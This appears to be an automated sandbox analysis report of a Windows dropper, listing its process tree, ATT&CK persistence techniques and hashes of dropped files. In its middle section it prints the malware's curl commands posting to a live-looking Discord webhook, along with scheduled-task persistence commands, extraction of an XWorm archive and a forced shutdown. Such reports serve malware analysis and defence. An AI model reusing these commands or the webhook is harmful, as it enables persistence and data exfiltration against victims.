C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --mojo-platform-channel-handle=10060 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --mojo-platform-channel-handle=9008 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --mojo-platform-channel-handle=9432 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --mojo-platform-channel-handle=5792 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --mojo-platform-channel-handle=9736 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --mojo-platform-channel-handle=9024 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --mojo-platform-channel-handle=5616 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --mojo-platform-channel-handle=10108 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --mojo-platform-channel-handle=9028 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --mojo-platform-channel-handle=10628 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --mojo-platform-channel-handle=8072 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --mojo-platform-channel-handle=4992 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --mojo-platform-channel-handle=10356 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --mojo-platform-channel-handle=11140 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --mojo-platform-channel-handle=11144 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --mojo-platform-channel-handle=8380 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --mojo-platform-channel-handle=11524 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --mojo-platform-channel-handle=11704 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --mojo-platform-channel-handle=11504 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --mojo-platform-channel-handle=12004 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --mojo-platform-channel-handle=12172 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --mojo-platform-channel-handle=12300 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --mojo-platform-channel-handle=12336 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --mojo-platform-channel-handle=12468 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --mojo-platform-channel-handle=12816 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --mojo-platform-channel-handle=12184 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2720 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:83⤵
- NTFS ADS
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9296 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2744 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2448 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:83⤵
-
C:\Users\Admin\Downloads\Dropper Builder.exe"C:\Users\Admin\Downloads\Dropper Builder.exe"3⤵
- Executes dropped EXE
- Modifies registry class
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"4⤵
-
C:\Windows\SysWOW64\curl.execurl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"5⤵
-
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Users\Admin\AppData\Roaming\$77-scchost.exe"5⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Users\Admin\AppData\Local\Temp\7zip\7z.exe"C:\Users\Admin\AppData\Local\Temp\7zip\7z.exe" x "C:\Windows\Resources\xworm fixed.zip" -o"C:\Windows\Resources\xworm fixed" -y5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\SYSTEM32\shutdown.exeshutdown.exe /f /s /t 05⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"' & exit5⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"'6⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7039.tmp.bat""5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\timeout.exetimeout 36⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\$77-install.exe"C:\Users\Admin\AppData\Local\Temp\$77-install.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""System.UnauthorizedAccessException: Access to the path 'C:\Users\Admin\Videos\thing' is denied. at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath) at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy, Boolean useLongPath, Boolean checkHost) at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options, String msgPath, Boolean bFromProxy, Boolean useLongPath, Boolean checkHost) at System.IO.StreamWriter.CreateFile(String path, Boolean append, Boolean checkHost) at System.IO.StreamWriter..ctor(String path, Boolean append, Encoding encoding, Int32 bufferSize, Boolean checkHost) at System.IO.StreamWriter..ctor(String path, Boolean append, Encoding encoding) at Dropper.Dropping.Main()"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\SysWOW64\curl.execurl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""System.UnauthorizedAccessException: Access to the path 'C:\Users\Admin\Videos\thing' is denied.5⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2448 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5984 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:23⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2780 -ip 27802⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749Filesize
330B
MD54060c33d521b297b208c8d27735af3bc
SHA1045c1b88fc574e240ab41c0a3bd5c3b1e1be4bf8
SHA256d0a248ff6e821fc8d3a9abcc2eead96a5696efbea754f981efbad74291a43bf3
SHA5129857ff0fb1be80dff585521dab213c59bf240c71a0c4be37db3c48e3d30ea8fa26eede2449e99eba5672fad53101491c33ab804cf6d345339835d428fa209dfd
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\10e24cbc-4ccf-467b-be53-24f32f0c57eb.tmpFilesize
88KB
MD52c35ef4824ce6b9fac269b83a27db3e5
SHA1a688573cd0fb09588f2db42f746c68bbb597b46e
SHA2560aa0a17d92ca90eb8afd3f3d246e5d03ae63dad0f8f64eaa9d38c4674bd91435
SHA512e30672958926301866f5df904aad96549f7f3e564a10a610411d6f92fd65d36fc609634159b8250eeffad26520ea89fd6447dbecbf9943c6a3eaeaaa3561ea2f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.datFilesize
40B
MD580faf8da59c87e3470d7e5c39570965e
SHA15591d926f085ec3f70dd7d6642628eea139ee1ef
SHA256ec406d96ded7030cc2a179d2a179d9497c5eadeb93ee7296dc182c210890617d
SHA5124cfe38bf7eb4b0b6c5660e06482f8981e5b2205318167eb420296deb3b33724943a25e2818e869cc960c49b484895448ec3423c4b238dd217fd63a64be68f3bb
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
1KB
MD5875c23fa20119622ef0030e7bf0f2f82
SHA12d7a3f667ea3b9b28673aebbceb60b4eea596813
SHA256363de1ffe20ed402b6c6b7433bc1bad4a6adcec2da1b736a77669d6418117202
SHA512527c09a2dd5c70831c55df047b94e267baa29c991383daed3646c44e003fefe874cb0b9f487a12de82ad9baabcbbb46c909a8af7135139d1b5b77c6cee38997e
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent StateFilesize
21KB
MD532abb4c73aa6dee7d892ca30d432c74e
SHA1603a9045df757fd1bf4defa48a11f54d72d53add
SHA256a64f54473b45ad2201f19886dda97bd8d27a30485f1303656dcb4ac8cab8ad46
SHA5127dedd14a5b0dc5e178748382c066fcdbf4ab8409e787fc0ef706f22dc20d6da2935acf3866b6de2d180ed9f441f1529e71ba769aeda2723927dc435f4be375f9
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending ReportsFilesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
6KB
MD5cc801b74aec86aa2a132b02d7b1837af
SHA140419a19184587d4a79fe4874d5a488efd306a01
SHA25644294b94b8aca246021f286fd8dafd317cdc87cfd06ab4f9bf1f46266eff4013
SHA5127750cf17f220c9bdaaa1c4014afbb130bf0696ededebc67be76b1e14bc977cfb1a805e8559ec6be171e88e08d1417746bff9d17f942c84e3ef777a89e1a367a4
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
356B
MD5d4a1f7110fd2d53bbd7d9b557882e299
SHA162aba993bb7cd216c2f5eb9b91c3c3cc3b182991
SHA256d4f4231b51bbd7bf9bff8c51377ea8370e5e4aedee4a2e01171b668caa6d7e8c
SHA5126589a92aabc3e19d10eeef21a4a2aeb8af36c1073598bf70ad25861bc1392b21d1ed43bd14b98f86b136d11c078475653593bbeeb09b9bbaeb0e0e0cbf71adc8
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
5KB
MD5e176fbc928ce1b88490afa665f707bb6
SHA1a8273fe4cc0a75d08de3a9fe8630e34412c543fb
SHA25664f490c9aa6e238293e1293bcd2f34a5d7965c22bcf79a5ff94bef52a8633a96
SHA5122bf3b8c6197f278cd0673c34fb43b255b785fcef7350233f3605b8f2cda43fdeff1c05ae4b19c1d9b91e903e228ec8aea35f49b1c8c6cd731fd63ce615303985
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
6KB
MD5966bd91064a66d138a5fa8eb7e13a06e
SHA19f4e39a60604c933ff0d4e2c2acc35e7dcd44de9
SHA256bf8c14f94ad82090d74bc9671c905bb7a50e62441617accfc48cf973466908f8
SHA512dd4fc3654326f85de22df57b5ad966828778c39e76e9fe64a73aed40bd924a2c76a18b362da5953deccf987788b9db8430c17489080ab6e007d67dbe49bdeef7
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\eb71c1b5-9087-4ad6-b8dc-6611bb461dcb.tmpFilesize
3KB
MD51175dc7503145de04a94a52c4b82d154
SHA1c8a89114bcbcfbca4c392a96beaeb4364b68aeea
SHA256f0ce9fb0a03ffede8f7d8e3508b9c710c470afc4dcb12bb4123fccffecc99fc2
SHA512f645658aad8dbd054896736f3267a5a3dcecb2095fa7f4626e0b647c5e127b6c950d9c04d740fb2c31738fabf40ad438b21953ed518ec5b176b0b18a632d6b22
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
7KB
MD54ca4f857a6a0bbd490e11d46ad2a9917
SHA1949d03f104b0601ec69d58c90ae76f6662857802
SHA256a103045d59590845206fbdbcd3d5f3cc50f016ae31000e368e00b5f38361a62e
SHA5128382a4d0749f866a501a3c322430e7af4a1e51bbfa03ba472c7ea87513cd655131732b029c649f80f5b39e6a071953a1d41f39652037538423275a45d6429430
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
6KB
MD5a20be48bec30f46e4480ef0b6c5ce264
SHA1b88c6995c85015940555df09943028935170beb7
SHA2567c7cd25fa704b20d38a0e546cf054bb2b8c7d147e7e08b26df6f9b4d57103507
SHA51204769c9fbdcfef7277a05d519ad4d2d741a3ef999e15693081c6b32be489be345b4bc5167448aa87ef62ed678f06078ed79fdb85766555709044d6e6d8dc8598
-
